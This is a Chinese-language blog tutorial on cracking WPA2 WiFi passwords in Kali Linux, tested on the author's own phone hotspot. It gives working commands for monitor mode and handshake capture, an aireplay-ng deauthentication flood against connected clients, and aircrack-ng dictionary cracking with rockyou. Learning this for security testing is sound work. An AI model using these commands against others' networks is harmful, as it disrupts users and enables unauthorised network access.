Kali 下wpa2安全下的WiFi密码解

这段时间沉迷与黑客技术无法自拔，当一名炫酷的黑客是每个男孩儿时的梦想，但是这条路也是艰辛的，孤独的，就看你有没有那个恒心一直走下去。现在网络很发达有很多的学习资源，能够很好的帮助我们学习一样东西，也记得以前有位大神说过（哈哈名字就不说了），学it Google，百度就是最好的老师。闲话不多说了下面笔者分享一下自己进行WiFi渗透的一个实例，既能帮助感兴趣的伙伴学习，也能使笔者后面更好的回顾。
在正式开始之前。我们先要准备相关的环境我这里用的是：
VMware Workstation Pro
kali-linux-2018.2-amd64.iso
重点：！！！！需要一张无限网卡
首先安装好kali （本文的重点是讲如何进行WiFi密码的破解所以怎么安装系统就简单介绍网上也有教程）
到此默认读者已经安装好了kali 有一点了解的同学都知道kali就是一个为渗透而生的Linux的发型版，她自带了300多个渗透工具，为什么叫她呢因为kali在印度音译为迦梨,(KALI,卡莉女神,卡利女神)是印度教中的一个女神，字面意思是“黑色的” 是印度很神秘的一派，好不扯远了。
安装好kali 那么要首先要进行的便是更新了，系统的更新，包的更新。
在linux里面更新那么就涉及到一个更新源的问题，kali官方的源因为国内网络的一些原因并不能正常的更新那我们就需要修改一下她的更新源。
kali 的更新源在路径/etc/apt / sources.list中
我们使用命令：
$vim /etc/apt / sources.list

添加完成后我们按esc键后 ‘：wq’保存退出
在输入命令
#apt-get update 首先要执行这条命令它是根据我们的更新源而列出索引供下面这条命令更新最新的包
# apt-get upgrade 更新软件包

国内比较好用的更新源笔者在下面列出来了：

#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free#浙大
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free#东软大学
deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib#官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

好在执行完上面两个命令后环境也基本安装好了，噢还有就是在kaili上下载东西不免很多我们都是在GitHub上下载，或者挂载，那样会有些慢又不想花钱挂vpn的小伙伴可以参考一下笔者下面的方法，可以很明显的提高下载速度：
额。。。思路就是：：git clone 特别慢是因为github.global.ssl.fastly.Net域名被限制了。只要找到这个域名对应的ip地址，然后在hosts文件中加上ip–>域名的映射，刷新DNS缓存就可以了
首先用下面方法查看域名，与IP
例如：http://github.com.ipaddress.com/#ipinfo 查看github.com的IP 与域名
http://github.global.ssl.fastly.net.ipaddress.com/#ipinfo 查看github.global.ssl.fastly.net的IP 与域名
将查找的域名，与IP 附加在路径为/etc/hosts的文件中：

保存并退出
修改完hosts还不会立即生效，你需要刷新DNS缓存，告诉电脑我的hosts文件已经修改了。
输入指令：sudo /etc/init.d/networking restart 即可。

插入无线网卡：
点击虚拟机选卡，选择可移动设备在里面找到你的网卡设备，点击连接就行
买网卡尽量买免驱网卡因为会省去安装驱动的麻烦

好万事俱备只欠东风了，下面就是本为的重点了：
第一步：
$ iwconfig 查看网络设备

出现黄色框内的内容及说明网卡被正常识别了
第二步：
为了避免后面不出错输入以下命令：
# service network-manager stop
# airmon-ng check kill
第三步：
# airmon-ng start wlan0 将网卡调为混杂模式
# iwconfig 检验是否成功

这样便设置成功
第四步：
# airodump-ng wlan0mon 扫描附近热点

本次笔者以自己手机开的热点作为测试
记住测试热点的bssid CH 信道数
第五步：
开始进行捕捉握手包：
命令# airodump-ng wlan0mon –bssid 4E:49:E3:64:5C:DF -c 9 -w wpa2

出现红框即表示捕获握手包成功
如果很长时间没有出现的伙伴在新打开一个终端窗口输入命令

# aireplay-ng -0 0 -a 4E:49:E3:64:5C:DF wlan0mon
洪水攻击冲垮连接热点的用户 强行使他们重新连接而得到握手包

第五步：
# ls wpa*

后面使用Kali Linux中默认存在的字典，进入目录为/usr/share/wordlists/rockyou.txt.zip，其中需要使用命令来解压：

再回到最先握手包的路径执行命令：
# aircrack-ng -w/usr/share/wordlists/rockyou.txt wpa2-01.cap

这样便以经得出了密码这个方法也只能破解比较简单的密码，例如纯数字或者纯字母还有就字母与数字组合的密码有特殊符号的那么破解就比较困难了，但你的字典足够强大那么就可以破解。

好了本文也到此结束了，本为只做教程教学，学习为主，警醒大家网络的安全意识，并不是教你干坏事。
未经作者同意严禁转载。